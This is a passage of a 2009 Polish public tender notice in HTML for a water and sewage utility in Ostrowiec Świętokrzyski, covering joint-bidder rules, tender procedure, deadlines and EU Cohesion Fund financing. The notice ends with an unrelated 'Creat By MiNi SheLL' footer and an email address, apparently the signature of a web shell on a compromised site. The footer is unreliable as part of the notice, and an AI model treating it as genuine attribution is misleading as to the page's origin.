2. W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego są zobowiązani do złożenia w ofercie pełnomocnictwa ustanawiającego pełnomocnika, o którym mowa w pkt 11.1. 
3. Pełnomocnictwo zawierać powinno umocowanie do reprezentowania w postępowaniu 
lub do reprezentowania w postępowaniu i zawarcia umowy.
4. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem. 
5. Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których Oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, 
są zobowiązani dostarczyć Zamawiającemu stosowną umowę regulującą współpracę, zawierającą w swojej treści minimum następujące postanowienia:
1) określenie celu gospodarczego, 
2) określenie, który z podmiotów jest upoważniony do występowania w imieniu pozostałych przy realizacji ww. zamówienia,
3) oznaczenie czasu trwania współpracy wykonawców wspólnie realizujących zamówienie obejmującego minimum okres realizacji przedmiotu zamówienia oraz gwarancji i rękojmi,
4) zakaz zmian w umowie bez zgody Zamawiającego, 
6. Nie dopuszcza się składania umowy przedwstępnej regulującej współpracę lub umowy zawartej pod warunkiem zawieszającym..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wodociagi.ostrowiec.net.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Wodociągi i Kanalizacja Spółka z o.o.
ul. Sienkiewicza 91
27-400 Ostrowiec Świętokrzyski
Dokument odpłatny:
Cena wersji papierowej specyfikacji: 18,30 zł (brutto).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2009 godzina 11:00, miejsce: Miejskie Wodociągi i Kanalizacja Spółka z ograniczoną odpowiedzialnością w Ostrowcu Świętokrzyskim - sekretariat 
ul. Sienkiewicza 91, 27-400 Ostrowiec Świętokrzyski.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Kontrakt będzie realizowany w ramach Projektu: 
UPORZĄDKOWANIE GOSPODARKI WODNO-ŚCIEKOWEJ W AGLOMERACJI OSTROWIEC ŚWIĘTOKRZYSKI - ETAP I współfinansowanego ze środków Funduszu Spójności w ramach: 
Działania 1.1 - Gospodarka wodno ściekowa w aglomeracjach powyżej 15 000 RLM 
Priorytetu I Gospodarka wodno - ściekowa 
Programu Operacyjnego Infrastruktura i Środowisko 2007-2013. 
Umowa o dofinansowanie: nr POIS.01.01.00-00-126/09-00 z dnia 29 czerwca 2009 r.

Creat By MiNi SheLL
Email: jattceo@gmail.com